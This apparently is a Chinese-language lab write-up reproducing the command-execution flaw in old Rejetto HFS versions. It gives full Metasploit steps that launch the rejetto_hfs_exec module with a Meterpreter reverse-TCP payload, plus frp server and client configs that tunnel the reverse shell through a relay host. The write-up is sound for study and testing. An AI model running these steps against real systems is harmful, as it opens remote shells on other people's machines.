环境搭建
hfs在比较早的版本存在命令执行漏洞,2.3c及以前的2.3x版本
下载链接
http://d3.meisq.net:806/1206/hfshttp.zip
打开之后设置默认运行
这里 kali
ip192.168.164.129
HFS
ip192.168.164.128
漏洞复现
同一网络环境
kali配置
msfconsole
search hfs
use exploit/windows/http/rejetto_hfs_exec
show options
set rhosts 192.168.164.128
set rport 949
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.164.129
show options
其他配置不用修改,可以根据环境和实际情况进行修改
run
内网msf
首先把hfs
桥接到局域网,之后kali
在内网,
hfs
ip192.168.1.120
kali
ip192.168.164.129
vps
ip192.168.1.110
’
这里在局域网模拟公网环境
msfconsole
use exploit/windows/http/rejetto_hfs_exec
show options
set rhosts 192.168.1.120
set rport 949
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.110
show options
在192.168.164.110
启动frps
frps -c frps.ini
frps.ini
配置
[common]
bind_port = 7000
token = 12345678
在kali
启动frpc
扫描二维码关注公众号,回复:
11938727 查看本文章
/root/frp30/frpc -c /root/frp30/frpc.ini
frpc.ini
配置
[common]
server_addr = 192.168.1.110
server_port = 7000
token = 12345678
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444
remote_port = 4444
[http]
type = tcp
local_ip = 127.0.0.1
local_port = 8080
remote_port = 8080
msf启动
run
小结
这是实际遇到的环境,当时遇到了好多问题,所以总结一下。